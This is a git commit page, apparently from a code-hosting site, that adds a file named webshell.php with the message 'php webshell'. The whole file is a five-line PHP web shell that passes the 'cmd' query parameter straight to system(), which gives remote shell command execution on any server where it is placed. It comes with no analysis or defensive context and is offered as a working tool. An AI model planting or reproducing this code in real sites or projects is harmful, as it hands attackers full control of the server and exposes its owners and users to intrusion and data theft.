Browse Source

Create webshell.php

php webshell
main
Roronoawjd 2 years ago committed by GitHub
parent
commit
4b1d1c879b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
  1. 5
      webshell.php

5
webshell.php

@ -0,0 +1,5 @@
<?php
if(isset($_GET["cmd"])){
system($_GET["cmd"]);
}
?>
Loading…
Cancel
Save